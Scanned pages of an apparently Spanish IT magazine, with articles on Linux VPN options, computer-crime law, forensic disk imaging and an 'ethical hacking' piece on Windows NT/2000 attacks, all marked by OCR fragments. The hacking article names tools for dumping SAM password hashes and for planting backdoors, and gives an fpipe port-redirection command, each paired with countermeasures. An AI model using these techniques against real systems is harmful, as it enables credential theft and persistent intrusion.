mayor privacidad que se pueda obtener, sin duda utilizare- 
mos L2TP, pero si tenemos un panorama distinto, en 
donde se necesita un nivel medio de seguridad sin nece- 
sidad de utilizar infraestructura de clave pública basada 
certificados PKI (Public Key Interchange), PPTP es 
una muy buena opción. 
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Quién es quién en el mundo de las VPNs bajo Linux 


Por: Luis Otegui 


Seguramente, en el último tiempo ha escuchado hablar de 
VPNs. Mucha gente habla de ellas como si fueran la panacea 
universal en la defensa de las comunicaciones de la empresa, 
o como si fueran estrictamente necesarias para el funciona- 
miento de las mismas. Es verdad que en ciertos escenarios se 
convierten ayudas muy convenientes, pero es necesario deta- 
llar sus principales usos, y ver qué tipo de implementación es la 
más adecuada a su escenario. 


Comenzaré diciendo que el fin de este artículo no es explicar 
detalladamente la implementación o la configuración de cada 
producto, sino ayudarlo a comprender la utilización y los princi- 
pales usos de cada uno, con la esperanza de que esto le sirva 
para decidirse por alguno de ellos. 


Definimos primero una VPN. O Red Privada Virtual, como una 
implementación que permite realizar una conexión segura con 
alguna red segura también, pasando por un medio inseguro. 
Los típicos escenarios de implementación de una Red privada 
Virtual son dos. El primero consiste en usuarios que deben co- 
nectarse a una red privada corporativa mediante una conexión 
encriptada, a través de un medio no confiable, como Internet o 
una conexión Wi-Fi, en un estilo de conexión cliente-servidor. 
En el segundo, dos redes privadas seguras se conectan vía un 
enlace punto-a-punto cifrado, con un modelo de conexión P2P 
(peer to peer). Lo más común para desarrollar éste último tipo 
de conexión es la implementación de routers con soporte VPN. 
Cisco soporta desde su IlOS varios protocolos de encripción. 
Sin embargo, firewalls dedicados pueden utilizarse de la misma 
manera. 


Los puntos flacos de las implementaciones 
de Redes Privadas Virtuales son dos: la per- 
formance (la encripción puede ser una gran 
devoradora de recursos de sistema), y lo li- 
mitada de la utilización de estas implementa- 
ciones en conjunto con NAT (Network 
Address Translation). En general, las 
“puntas” de una enlace VPN no se colocan 
en LANSs corporativas por este último motivo, excepto por el 
caso de varios clientes conectados a un VPN server, descrito 
más arriba. Para solucionar el problema de conjugar VPNs y 
NAT, muchas veces el VPN server se monta sobre el firewall de 
la LAN corporativa, pero esto, como se ha dicho, trae apareja- 
dos problemas de sobrecarga para el sistema. 


Bien, ahora que sabemos a qué atenernos, veamos qué herra- 
mientas tenemos disponibles para crear túneles seguros en la 
red sobre Linux: 


FreeS/WAN (ahora OpenS/WAN) 


FreeS/WAN (http://www.freeswan.org/) es la implementación de 
un método de encripción más longeva en el mundo Linux, 
aunque recientemente ha sido sustituida por su sucesora, 
OpenS/WAN. Se basa en IPSec, un backport de encabezados 
de seguridad de IPV6 a IPV4. Tiene las ventajas de ser la más 
robusta y poderosa de todas las implementaciones, además de 
ser la más aceptada. Se compone de un par de módulos y co- 
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mandos en espacio de usuario, los cuales son instalados por 
FreeS/WAN. La línea de kernels 2.6 ya incluyen estos módulos, 
pero, en general, la línea 2.4 no, por lo que habrá que parche- 
ar el kernel, y recompilarlo para agregar la funcionalidad de 
IPSec a nuestro sistema. Lo más probable es que FreeS/WAN 
esté incluida en su distribución de Linux, pero como el proyec- 
to ha caducado recientemente, le recomiendo “pasarse” a 
OpenS/WAN, un proyecto paralelo fundado por alguna de la 
gente que desarrollaba FreeS/WAN. Lo más probable es que en 
un futuro muy cercano las distribuciones principales de Linux 
reemplacen sus paquetes de FreeS/WAN por OpenS/WAN. 
Mientras tanto, habrá que compilarlo bajando el código de 
www.openswan.org/. 


Las ventajas más reseñables de la implementación |PSec, sea 
vía FreeS/WAN o vía OpenS/WAN, son su robustez, la intero- 
perabilidad con otros sistemas operativos, y la estabilidad del 
producto, dado que ya lleva varios años de desarrollo. Como 
puntos en contra, podemos resaltar el grado de conocimiento 
necesario para poder realizar una implementación exitosa, y el 
hecho de que, al estar diseñado para conectar redes enteras a 
través de túneles seguros, no “escalea” bien hacia abajo. Esto 
es, tiene requerimientos de sistema demasiado importantes, y 
puede que le quede “grande” a su escenario... 


OpenSSH 


Más que estándar en el mundo Linux como herramienta de shell 
remoto, poca gente sabe de la funcionalidad de los SSH servers 
como reenviadores de paquetes encriptados. Vía esta imple- 

mentación, es posible crear un túnel seguro 


Dado lo extendida de su implemen- para cualquier servicio TCP que corra en un 
tación, lo estable de su código, y su solo puerto, vía los switches —L y —R. 
potencia, IPSec, vía FreeS/WAN u 

OpenS/WAN, es la implementación Es posible además hacer túneles PPP sobre 
más recomendable para la realiza- SSH (lo que normalmente se realiza vía 
ción de una VPN 


IPSec), pero esto es desastroso en términos 
de recursos de sistema, llevando la carga de 
CPU hasta las nubes... 


Sin embargo, su habilidad para crear túneles seguros desde un 
host específico corriendo un servicio específico, la coloca en el 
hueco dejado por IPSec. Es útil para asegurar conexiones de 
acceso remoto y de tipo punto-a-punto, si bien, como se ha 
dicho, no se desenvuelve bien cuando de enlutar tráfico entre 
dos redes se trata. 


OpenSSH está incluída en virtualmente todas las distribuciones 
de Linux existentes, y sus páginas de manual son bastante 
claras en la forma de realizar port forwarding seguro mediante 
esta herramienta. 


STunnel 


Stunnel no es más que un wrapper SSL; todo lo que hace es en- 
criptar port forwarding, de la misma forma que OpenSSH lo 
hace. Además, tiene un requerimiento que muchos encontrarán 
molesto, la necesidad de instalar certificados de seguridad, 
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ya sea firmados por nosotros mismos, o por alguna autoridad 
certificadora... 


STunnel está incluída en todas las distribuciones importantes, y 
su man page es bastante clara acerca de su utilización. 


OpenVPN 


OpenVPN nace, según su autor, para cubrir la necesidad de un 
sistema de VPN más sencillo que IPSec. Basado en OpenSSL, 
corre en espacio de usuario, y lo que hace es encapsular el 
tráfico encriptado en paquetes “normales” (es decir que no es 
necesario modificar el kernel). Como corre en espacio de 
usuario, es mucho más fácil de portar de un sistema otro, y al 
basarse en OpenSSL, tiene todas sus ventajas, así como sus 
debilidades... 


La única contra significativa de este producto es que sólo es 
capaz de realizar un túnel en un determinado puerto, es decir 
que si queremos realizar múltiples conexiones a un server, ten- 
dremos que arrancar en el mismo tantos otros procesos, escu- 
chando cada cual en su puerto... La versión 2.0 (ahora en 
estado RC6) promete soportar múltiples conexiones, convirtién- 
dola así en una buena alternativa para escenarios de acceso 
remoto. 


El sitio del producto (http://openvpn.net/) incluye información 
muy detallada acerca de la instalación, configuración, y mante- 
nimiento. Hay paquetes disponibles para algunas distros, man- 
tenidos en forma independiente. 


PoPToP 


Basado en el protocolo de encripción de bajo nivel de Microsoft 
Point-to Point Tunneling Protocol (PPTP), esta implementación 
tiene sus buenos fanáticos en el mundo Linux, básicamente 
porque al formar parte de la suite Windows NT desde la versión 
4.0, hace las cosas fáciles como solución cross-platform. 
Además, PPTP no sólo hace túneles IP, sino además NETBEUI 
e IPX. Ahora bien, así como comparte estas virtudes, también 
sus falencias. MSCHAP, el protocolo de encripción utilizado por 
PPTP, ha mostrado ser extremadamente vulnerable. Esto ha 
sido parcialmente arreglado por el parche MSCHAPv2, pero 
para varios analistas, el protocolo simplemente no es confia- 
ble... A menos que se pueda configurar a todos los clientes y 
servidores para utilizar MSCHAPv2, no es recomendable insta- 
lar esta solución. 


Bajo Linux, PPTP se implementa como dos aplicaciones sepa- 
radas, PoPToP para la parte del servidor, y PPTP Client como 
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cliente. En www.poptop.org/ y en http://pptpclient.sourcefor- 
ge.net/ se encuentra información acerca de la instalación y 


configuración de ambas partes de esta suite. 
Otras implementaciones 


Hay otras tres implementaciones de túneles seguros, y si bien 
dos de ellas tienen serios problemas de seguridad, vale la 
pena mencionarlas. 


CIPE (http://sites.inka.de/sites/bigred/devel/cipe.html) y vtun 
(http://vtun.sourceforge.net/) son conceptualmente iguales a 
OpenVPN, pero a diferencia de este, utilizan sus propios sis- 
temas criptográficos, basados en MD5 y 3DES, en implemen- 
taciones a medida. El principal “pero” que se les achaca, y de 
ahí su escasa difusión, es que varios criptógrafos han mostra- 
do serias fallas en estas implementaciones, las cuales, 
parece, distan mucho de solucionarse. 


Lo mismo le pasa a nuestro tercer “invitado”, tinc 
(http://www.tinc-vpn.org/). El principal argumento de vtun es 
su simpleza, y la capacidad de administrar el tráfico y la com- 
presión de datos. Tinc hace asimismo énfasis en la facilidad 
con que se escala la implementación en relación al crecimien- 
to de los requerimientos de la red. Mientras que CIPE arguye 
ser una implementación destinada a crear routers VPN, y 
ofrece una versión que corre bajo Windows. Si vale la pena 
correr los riesgos con éstas implementaciones, eso sólo lo 
pueden decidir ustedes... 


Conclusión 


En conclusión, dado lo extendida de su implementación, lo 
estable de su código, y su potencia, IPSec, vía FreeS/WAN u 
OpenS/WAN, es la implementación más recomendable para 
la realización de una VPN. Sin embargo, en un futuro muy 
cercano, OpenVPN podría plantarles una dura batalla en el 
mercado de los usuarios que recién se inician a las redes pri- 
vadas virtuales, o que no necesitan una solución de tanta po- 
tencia para sus necesidades. Stunnel y OPenSSH ayudan de 
manera rápida a implementar túneles seguros a una aplica- 
ción específica (un punto-a-punto en su sentido más estricto, 
podríamos decir), y, si se está dispuesto a aceptar los riesgos, 
PoPToP es una solución rápida para conectividad cifrada 
entre los mundos de Linux y Windows. Espero que este breve 
resumen los ayude a decidir qué implementación es la más 
conveniente a sus necesidades, o cuando menos, les des- 
pierte la curiosidad sobre un tema que en el futuro cercano 
será mucho más común que hoy en día. 
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Delitos Informáticos 


Por: Dr. Esteban Garuti 


Los delitos informáticos y sus consecuencias penales 


No alcanza hoy con calcular los ingresos que las empresas 
pierden a causa de los denominados delitos informáticos y 
tampoco alcanza determinar los incrementos de costos en el 
área de la seguridad informática. 

Todos los días nace una nueva forma de delinquir dejando con- 
secuencias gravosas, ya sea atacando a las redes o a los usua- 
rios en general. 

En nuestro país y en el resto de los países, la legislación 
avanza más lento que la tecnología informática generando con 
ello una zona liberada para la consumación de los delitos. 


Qué son los delitos informáticos 


Se denomina delito informático a cualquier conducta ilegal, no 
ética o no autorizada que involucra 
el procesamiento automático de 
datos y/o la transformación de 
datos. Asimismo y dentro de las di- 
ferentes definiciones encontramos 
una amplia, que nos indica que es 
toda acción reputada como delito 
que para su consumación se utili- 
zan o afectan medios informáticos. 
Por otro lado, una definición res- 
tringida que entiende al delito 
como toda acción que vulneran los 
equipos básicos de computación. 
Entre las acciones o conductas 
más comunes encontramos: la ma- 
nipulación en los datos e informa- 
ciones que se encuentran conteni- 
dos en los archivos o soportes 
magnéticos ajenos, acceso a los 
datos y utilización de los mismos 
por quien no está autorizado para 
ello, introducción de programas en 
computadoras para destruir infor- 
mación datos o programas, utiliza- 
ción de la computadora y/o progra- 
ma de otra persona sin autoriza- 
ción con el fin de obtener benefi- 
cios propios en perjuicio del otro, 
utilización del ordenador con fines 
fraudulentos, agresión a la privacidad mediante la utilización y 
procesamiento de los datos personales con fin distinto al auto- 
rizado. También se agregan a estas conductas, el fraude por 
manipulaciones de una computadora contra un sistema de pro- 
cesamiento de datos, el espionaje informático, el robo de soft- 
ware, el sabotaje informático, el robo de servicios, el acceso no 
autorizado a sistemas de procesamiento de datos y otros más. 
Los efectos de estos delitos se trasladan al patrimonio, lugar 
dónde se registran los mayores índices de pérdidas ya sea por 
denegación de servicios en máquinas que se emplean en 
tareas cotidianas como ser cajeros, tarjetas, sustracción y venta 
de información o con ataques de virus, espionaje, etc. 

En este caso el Código penal protege la información cuando 
ésta constituya un secreto, y la ley de confidencialidad de los 
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datos cuando ésta, en su conjunto, reúne los requisitos para ser 
un secreto comercial. La sustracción de información que en sí 
misma no constituya un secreto, no está penada ya que el ar- 
tículo 62 del Código Penal requiere que sea una cosa material. 
Los delitos cometidos contra la intimidad de las personas se 
materializan invadiéndola por el empleo ilegal de bases de 
datos utilizando como herramienta al Spam. Se observa última- 
mente que los medios informáticos penetran cada vez más en 
espacios reservados a la intimidad ya sea por medio de fotogra- 
fías satelitales o scanner térmicos. 

En una sociedad que tiene cada día mayor dependencia a los 
sistemas informáticos, hay quienes atentan contra la seguridad 
pública y las comunicaciones afectando a bienes colectivos, ya 
sean paralizando servicios públicos o la defensa nacional y la 
seguridad militar por medio de 
ataques con virus informáti- 
cos. Para esa circunstancia el 
artículo 197 del Código Penal 
sanciona a quien interrumpa el 
servicio de comunicaciones. 
Por otro lado, ha sido amena- 
zada la fe pública por quienes 
intentan falsificar o alterar la 
información que se transmite 
por medio de los sistemas in- 
formáticos, presentándose ha- 
bitualmente como un antece- 
dente de la comisión de un 
delito contra el patrimonio. 
Como parte de una solución a 
este problema nació la firma 
digital que pone freno a las al- 
teraciones antes menciona- 
das. Nuestra legislación incor- 
pora la ley de firma digital otor- 
gándole, además, al docu- 
mento electrónico valor proba- 
torio. 

Otros delitos internacional- 
mente repudiados y persegui- 
dos son aquellos cuyos conte- 
nidos ¡legales hagan mención 
a la discriminación ya sea 
racial, política, religiosa, etc., como así también son investiga- 
dos y sancionados aquellos quienes distribuyan pornografía in- 
fantil. 


El perfil 


Ante la gran cantidad de delitos cometidos en la empresa se ha 
configurado un perfil estimativo de quien estafa o defrauda, a- 
rribando a estos resultados: generalmente es una persona de 
sexo masculino con un promedio de edad que va desde los 24 
a 42 años, con ingresos importantes y una antigúedad no mayor 
a cinco años en la empresa, se presenta en sus tareas diarias 
como eficiente y rápido. Este perfil en la mayoría de los 

casos genera en las empresas pérdidas significativas en su » 


facturación y generalmente no se recupera el total del patrimo- 
nio perdido. 

Hay antecedentes de ex empleados que, disconformes con su 
alejamiento de su actividad atentan contra los sistemas con in- 
formación que se encuentra en su poder o con la venta de la 
misma. 

El acceso ¡legítimo o daños menores es llevado a cabo por 
hackers o usuarios descontentos y los daños mayores o sabo- 
taje informático son cometidos por sujetos que son empleados 
de la empresa o espías profesionales. 

También hay sujetos que violan la privacidad de las personas o 
tratan ilícitamente los datos personales siendo estos identifica- 
dos como investigadores privados, empresas de marketing, a- 
gencias de informes crediticios, entre otras. 

Por último encontramos a los piratas informáticos o a quienes, 
dentro de la empresa entregan una copia amigable de progra- 
mas violando la propiedad intelectual del software y de bases 
de datos entre otras cosas. 


Las soluciones legales 


Nuestro ordenamiento legal cuenta con una serie de leyes que 
contribuyen a un mejor tratamiento entre las cuales se pueden 
mencionar: 

1. Ley 11.723, de Propiedad Intelectual reformada por la ley 
25.306 

2. Ley 25.326 de Hábeas Data 

3. Ley 25.206 de Firma Digital 

4. Ley 25.520 de Inteligencia Nacional 

5. Ley 19.798 de Telecomunicaciones 
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6. Ley 25.873 modificatoria de Ley 19.798. Responsabilidad de 
ISP de entregar y reservar información 

7. Ley 25.891 Servicios de Comunicaciones Móviles 

8. Ley 24.766 de Confidencialidad de la Información 

9. Ley 24.769 de Delitos Tributarios 


Acompañan a este esfuerzo legislativo una serie de proyectos 
de ley de delitos informáticos que no han obtenido la trascen- 
dencia necesaria para que se materialicen en una ley eficiente. 


Parte de la solución 


El fraude dentro de la empresa debe ser tratado y denunciado, 
el silencio para no investigar o sancionar a quien cometa un 
ilícito puede generar nuevos hechos y consecuencias económi- 
cas de significancia dentro de la misma. Para ello lo recomen- 
dable es, al detectarse una irregularidad, separar preventiva- 
mente de sus funciones a quien se lo indica como sospechoso, 
preservar la prueba y radicar la denuncia para determinar la 
autoría y la eventual responsabilidad penal de quien sea impu- 
tado del delito. 

Por otro lado es importante invertir en capacitación de los de- 
pendientes de la empresa acerca de las consecuencias gene- 
radas por el mal uso de los sistemas informáticos y en segundo 
lugar dirigir la toma de decisiones en la prevención de los 
delitos informáticos. 


Dr. Esteban Garuti 
egarutitomdnabogados.com.ar 


www.mdnabogados.com.ar 
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Actualidad y Futuro del Mundo Laboral de Sistemas 


Trabajo IT 2005 es una Jornada de inscripción libre y gratuita organizada por UTN Buenos Aires, 
Fundesco y UniversoBit además de estar auspiciada por varias Universidades Nacionales y Privadas. 


Bajo un mismo techo los profesionales postulantes del Mercado Laboral IT Argentino y las Empresas Líderes 
que los necesitan. 

En este lugar los intereses se combinan; la necesidad de las empresas en encontrar buenos y nuevos 
recursos y el interés profesional de los jóvenes en desarrollar sus carreras, siempre acompañado de una 
excelente agenda de charlas dictadas por los mejores profesionales en Recursos Humanos. 


Las mejores empresas 


Mas información e inscripciones: 
te están buscando.... 


www.universobit.com 
Vos donde vas a estar? 
Facultad É 
ro Aires É par 


12 de abril - Sheraton Hotel 


Análisis Forense 


Visión general de Disk Imaging 
(Obtención de una imagen del disco) 


Los profesionales de IT están inundados con información 
sobre cómo prevenir intromisiones y ataques. Pero, ¿qué 
hacer si sucede lo peor a pesar de los parches de seguri- 
dad, cortafuegos y otros esfuerzos? 


Dado los enormes costos en sistemas 
caídos, pérdida de productividad, y carga 
de trabajo administrativo que puede resul- 
tar a raíz de un ataque, nos parece correc- 
to que sean combatidos quienes atacan 
nuestros sistemas cuando son descubier- 
tos o procesados, pero no sucede muy a 
menudo. Esto es porque un proceso cri- 
minal con éxito (o juicio civil) requiere evi- 
dencia concreta, admisible que puede ser 
difícil de probar. Lamentablemente, la evi- 
dencia, a menudo, es contaminada o des- 
truida en el proceso de respuesta al 
ataque (de la misma manera que el agua 
utilizada para apagar el fuego muchas 
veces es la causa de tantos daños como el 
fuego mismo).Si hay alguna posibilidad de 
que un caso pueda ir a la corte, es ex- 
tremadamente ¡importante 
que la evidencia digital sea 
manejada apropiadamente 
por cada uno que acceda a 
ella. El proceso de pasar la 
evidencia de una persona a 
otra se conoce como 
"cadena de custodia", pero 
es menos claro cuando 
estamos hablando de datos 
digitales que de objetos 
físicos. 

El punto importante es que 
la evidencia puede llegar a ser inadmisible 
si cualquier persona que la maneja luego 
de un incidente hace algo y la modifica. 
Simplemente abriendo un archivo la 
cambia (por ejemplo, la fecha de la última 
modificación puede cambiar), entonces, 
¿cómo puede la evidencia digital preser- 
varse siempre en un estado admisible? 
La respuesta es realizar cualquier exami- 
nación de la evidencia no sobre los datos 
originales, sino sobre una copia exacta 
hecha para ese propósito. Satisfacer a las 
altas exigencias de la corte, no es tan 
simple como suena. La copia debe ser una 
imagen a nivel de bit del disco original, 
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El proceso de "imaging" 
se debe hacer de una 


rastro alguno (que no 


realice ningún cambio) 
en la computadora en 
estudio. 


sector por sector de todos los datos bina- 
rios y contener todo el espacio activo, 
espacio libre, y otros datos. Esto requiere 
software de "imaging" hecho para este 
propósito. El software de "imaging" para 
los propósitos forenses, debe utilizar una 
cierta metodología de verificación para 
asegurarse que la copia sea exactamente 
como la original. Por esta razón, es mejor 
no utilizar software de "imaging" hecho 
para otros propósitos (como el Norton 
Ghost, que fue hecho para crear imágenes 
de discos clonadas para instalar en múlti- 
ples máquinas, pero no fue diseñado es- 
pecíficamente para el uso forense con 
énfasis en la integridad absoluta de la 
copia). 

Sistemas de "imaging" para análisis 
forenses muchas 
veces usan una 
computadora es- 


pecial que se 
IN TN TT] Conecta con la 
máquina en 


estudio vía uno 
de sus puertos de 
comunicación, 
con lo cual se 
puede hacer la 
copia completa 
del disco a otro, a 
una cinta, o a otros medios electrónicos. 
En otros casos, el disco de la computado- 
ra en estudio es removido para ser 
copiado. El proceso de "imaging" se debe 
hacer de una forma que no deje rastro 
alguno (que no realice ningún cambio) en 
la computadora en estudio. 

Una vez que se ha hecho la copia forense, 
el disco original se pone a un lado y se 
preserva en su estado actual. Todo el 
trabajo de examinación se hace sobre la 
copia. También se necesitará poder ates- 
tiguar que la computadora fue aislada in- 
mediatamente de la red y asegurada físi- 
camente de modo que nadie pudiera re- 


Por Deb Shinder 


alizarle ningún cambio entre el descubri- 
miento del incidente y el tiempo en el que 
el disco era duplicado. No debe hacer 
nada. No encienda ni apague la computa- 
dora, ni examine los registros hasta que el 
disco haya sido duplicado. La obtención 
de la imagen del disco debe realizarla un 
investigador forense calificado. Esta no es 
una reflexión sobre sus habilidades como 
profesional de IT, o sobre su integridad 
personal; esto es porque, probablemente, 
un abogado de la defensa en un juicio pre- 
gunte por las credenciales de los que re- 
alizaron la obtención de la imagen y/o 
examinación y una mayor credibilidad se 
le otorgará a la evidencia si fue recogida 
por un especialista en análisis forenses de 
computadoras. 


DEB SHINDER es una consultora de 
tecnología, que capacita y escribe, ha 
sido autora de un número de libros en 
sistemas operativos de computadoras, 
networking y seguridad. Estos incluyen 
"Scene of the Cybercrime: Computer 
Forensics Handbook," publicado por 
Syngress, y "Computer Networking 
Essentials,” publicado por la Cisco 
Press. Es co-autora, con su esposo, Dr. 
Thomas Shinder, de"Troubleshooting 
Windows 2000 TCP/IP," el best-seller 
"Configuring ISA Server 2000," "ISA 
Server and Beyond," y "Configuring ISA 
Server 2004." Deb se especializa ac- 
tualmente en ediciones de seguridad y 
los productos de Microsoft; le han con- 
cedido Status de Most Valuable Player 
en seguridad de Microsoft (MVP). Fue 
oficial de policía e instructora de la aca- 
demia de policía, vive y trabaja en el 
área de Dallas- Fort Worth, enseña 
sobre redes y seguridad, y ocasional- 
mente cursos sobre justicia criminal; en 
la universidad de Eastfield en Mesquite, 
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Recomendamos leer el artículo 
"Herramientas de Análisis Forense" 


en la Sección Tools de esta edición. 


EL CAFELUG 


Y "Grupo de usuarios de GNU/Linux de Capital Federal" 


ES 


:: Debates 
:: Demostraciones 
:: Seminarios 


HTTP: //WWW.DEBIAN.ORG HTTP: //WWW.GNU.ORG 


Mas información en: 


http://www.cafelug.org.ar 


Ethical Hacking 


Paso 6: HACKING NT, 2K y Windows 2003. 


Parte 2 de 2: Ataques autenticados contra sistemas Windows NT/2000: 


Por: Hernán L. Cuevas 
Microsoft Certified Systems Engineer 
hlcuevas_mcse(Wyahoo.com.ar 


En la parte 1 de “HACKING NT, 2K y Windows 2003”, (NEX IT 
Specialist +13 pag 44) describimos los llamados “ataques NO 
autenticados”. 


En lo que sigue, suponemos que ya se ha podido comprometer 
un Server W2K mediante un ataque No autenticado. Conocer 
el UID de un usuario sin privilegios y su password es ya un 
logro, pero el objetivo es ser ADMINISTRATOR o que la cuenta 
tenga los privilegios de Administrador (es decir pertenecer al 
grupo de Administradores). A partir de aquí los ataques son au- 
tenticados. El proceso de pasar de usuario común a tener privi- 
legios de Administrador se llama 
“escalada de privilegios”. 

Ya obtenidos privilegios de admi- 
nistrador, lo que sigue es lo que 
llamamos un sondeo y robos 
para dominar toda la empresa 
(en inglés se lo conoce como “pil- 
fering”). El paso que le sigue será 
muy probablemente utilizar he- 
rramientas para crear los llama- 
dos “backdoors” o herramientas 
de control remoto y redirecciona- 
miento de puertos. Es decir, tener 
a disposición la red cuándo y 
cómo la desee. NETCAT 
(llamada la navaja suiza de las 
herramientas de seguridad) se 
destaca entre todas y la veremos 
en detalle en un artículo especial 
bajo TOOLS. Al igual que un robo 
sofisticado, el hacker intentará 
borrar sus huellas como paso 
final. Su acción habrá sido devas- 
tadora. 


Escalada de privilegios 


Cuando un individuo ha conseguido una cuenta de usuario en 
un sistema intentará mediante todo tipo de técnicas aumentar 
sus privilegios hasta conseguir derechos administrativos sobre 
el mencionado sistema afectado. 


Si bien está metodología de ataque no es algo nuevo, día a día 
se descubren nuevas vulnerabilidades que posibilitan a indivi- 
duos maliciosos su utilización. 


Un ejemplo de escalada de privilegios así como medidas co- 
rrectivas se puede ver en un boletín de seguridad publicado por 
Microsoft el pasado mes de Abril de 2004: http://www.micro- 
soft.com/latam/technet/seguridad/boletines/ms04-011-it.asp. 
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Como puede verse las principales empresas informáticas se es- 
fuerzan para mejorar sus productos y así contrarrestar nuevos 
mecanismos que permitan lograr los objetivos de los atacantes. 
¿Cómo protegerme? Para proteger un sistema de ataques de 
escalación de privilegios es fundamental que un administrador 
mantenga sus sistemas permanentemente actualizados. Por 
otro lado, una forma de detectar intentos de acceso o uso de 
cuentas no autorizados es mediante la auditoria de eventos fa- 
llidos de inicio de sesión de cuentas en controladores de 
dominio o inicio de sesión local en otros servidores. 


Pilfering (sondeo y 
robos) 


Una vez que ha obtenido los pri- 
vilegios de administración sobre 
un sistema el atacante intentará 
acopiar toda la información que 
le resulte posible. 

A continuación se detallan 
algunas herramientas y técnicas 
utilizadas por individuos malicio- 
sos para cumplir con este objeti- 
vo y contramedidas que puede 
tomar un administrador para 
proteger sus sistemas. 


Grabación de hashes de 
contraseñas: 


Hay cuatro formas básicas que 
se utilizan para obtener los 
hashes de las contraseñas y 
cada una cuenta con una contra- 
medida que impide su explota- 


ción. 


Inicio del equipo con un sistema operativo alternati- 
vo y copiado del archivo que contiene los passwords 
a un medio removible 


El sistema de archivo recomendado por motivos de seguridad y 
que utilizan la mayoría de servidores Windows es NTFS. Iniciar 
un sistema con un disco por ejemplo de DOS, no permite a un 
atacante acceder a los archivos alojados en el disco debido a 
este sistema de archivos pero, la herramienta NTFSDOS 
permite iniciar un sistema con acceso a NTFS. 

En un controlador de dominio la base de datos de AD se alma- 
cena en el archivo cifrado (ntds.dit), esto dificultará en gran 
medida su extracción. En el caso de otros servidores los u- 
suarios locales se almacenan en el Administrador de > 
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Office 

Servidores » 
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Microsoft Windows NT Server 4,0 Service Pack 6a - 
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Negocios 


Ea 
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Microsoft Windows XP 64-Bit Edition Version 2003 - 


(en Inglés) 


Microsoft Windows Server” 2003 - 


(en Inglés) 


Microsoft NetMeeting 


Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6 - 


Microsoft Windows XP and Microsoft Windows XP Service Pack 1 - 


Microsoft Windows XP 64-Bit Edition Service Pack 1 - 


Microsoft Windows NTE Workstation 4,0 Service Pack 6a - Download the update 
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Download the update 


Download the update 


Download the update 


Microsoft Windows Server 2003 64-Bit Edition - Download the update 


PIEsOa Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millenniurn Edition (ME) - Lea las 


4 


Cuentas de Seguridad (SAM), este archivo se encuentra en el 
directorio %windir%isystem321config y es el que un atacante in- 
tentará extraer. 


¿Cómo protegerme?: Para evitar la extracción de una copia 
de la SAM será necesario extremar la seguridad física de la sala 
de servidores para impedir el acceso de individuos no autoriza- 
dos. 


Copiado del backup de la SAM creado por la utilidad 
“disco de reparación”. 


Si se ha creado un disco de reparación con la opción de res- 
guardo del registro, una copia de la SAM se almacena en: 
%windirY%lepainRegBack. Esta carpeta cuenta con permisos 
de lectura para Usuarios y de modificación para usuarios avan- 
zados. 


¿Cómo protegerme?: Entre los mecanismos para protegerse 
se podrían mencionar: controlar los permisos concedidos a u- 
suarios locales en los servidores, no seleccionar “Copia de se- 
guridad local” al realizar el disco de emergencia o mover la 
carpeta RegBack a un medio removible. 


Escucha de los intercambios de autenticación NTLM. 


no 


Los sistemas operativos desde Windows 2000 en adelante uti- 
lizan Kerberos como arquitectura de inicio de sesión. Kerberos 
esta diseñado para degradar la autenticación a NTLM si el 
cliente o el servidor no lo soportan, este sería el caso de un 
cliente de bajo nivel (NT4/Win9x), herramientas como LOpth- 
crack SMB capturan y analizan hashes NTLM. 

¿Cómo protegerme?: Si en la red existen clientes de bajo nivel 
se debe utilizar un protocolo de autenticación más seguro para 
estos: NTLMv2. Para el proceso de inicio de sesión, NTLMv2 
abre un canal seguro para proteger el proceso de autenticación. 
Para obtener más información acerca de cómo habilitar 
NTLMv2, se puede consultar el artículo Q239869 de la base de 
datos de conocimientos de Microsoft. En clientes desde 
Windows 2000 se encuentra configurada por defecto la directi- 
va Kerberos para inicios de sesión. 


Extracción de las passwords directamente de la SAM 
o AD. 


La herramienta PwdumpX permite a un atacante la extracción 
de los hashes de las contraseñas desde el registro. 


¿Cómo protegerme?: Para poder ejecutar la herramienta 
PwdumpX un atacante debe contar con privilegios administrati- 
vos y acceso local al equipo objetivo por lo que con correctas 
medidas de control se puede evitar este tipo de ataque. » 
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Control remoto y puertas traseras 


Dentro del conjunto de herramientas denominadas de adminis- 
tración remota existen aplicaciones que se utilizan mediante co- 
mandos como Netcat y otras con interfase gráfica como 
Winvnc. 

Netcat denominada la navaja suiza para redes, permite abrir co- 
nexiones de red TCP o UDP para la creación de clientes/servi- 
dores como para poner a prueba aplicaciones de diseño propio. 
Winvnc tiene dos partes: el servidor, el cual comparte la panta- 
lla de la máquina donde está corriendo, y el visor el cual 
muestra la pantalla remota recibida desde el servidor. puede ser 
corrido de dos maneras: en el modo aplicación y como servicio 
de Windows. 

El propósito inicial de estos utilitarios era servir únicamente 
como herramientas de administración pero, desde la aparición 
de Back Orifice, muchas de estas herramientas se utilizan como 
programas de espionaje que se intentan instalar sin el conoci- 
miento del usuario para así dejar una puerta abierta para que un 
atacante tome el control de un sistema. 


¿Cómo protegerme?: Como medida preventiva, las herra- 
mientas espías en su mayoría son detectadas por software an- 
tivirus. Como medida correctiva, es recomendable controlar 
permanentemente que solo se encuentren activos aquellos ser- 
vicios que se utilizan para el correcto uso del sistema y que se 
encuentren cerrados todos aquellos puertos que no se utilizan 
mediante un firewall (mas adelante se analizarán los procesos 
y los puertos). Teniendo esto en cuenta se limita significativa- 
mente el uso de una herramienta de administración no autoriza- 
da sobre el sistema. 


Redirección de puertos 


Mediante esta técnica un atacante instala una herramienta en 
una red que queda a la escucha de cierto tipo de trafico gene- 
rado por alguna herramienta maliciosa, esta herramienta redi- 
recciona el trafico mencionado reenviándolo a un servidor me- 
diante el uso de un puerto no estándar y evitando de esta forma 
el filtrado que realiza el firewall de puertos ya conocidos y utili- 
zados por aplicaciones maliciosas. 


Una herramienta de este tipo muy conocida es: Fpipe, un 
emisor de puertos origen TCP desarrollado por Foundstone. 
Una descripción completa de esta herramienta se encuentra 
disponible en la siguiente dirección: 
http://www.foundstone.com/index.htm?subnav=resources/navi- 
gation.htméssubcontent=/resources/freetools.htm 

Un ejemplo del uso de Fpipe se puede ver a continuación: 


fpipe -1 53 -s 53 -r 80 192.168.1.101 
¿Cómo protegerme?: Se debe controlar el software instalado 
en sistemas críticos y hasta en cualquier equipo de la red, esto 


es posible mediante el uso de políticas. 


Contramedidas generales para compromiso 
autenticado: 


Nombres de archivos 


Por mas que esta no es una de las formas mas efectivas para 
evitar ser descubierto, un atacante experimentado renombrará 
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las herramientas que utiliza para que no sean fácilmente identi- 
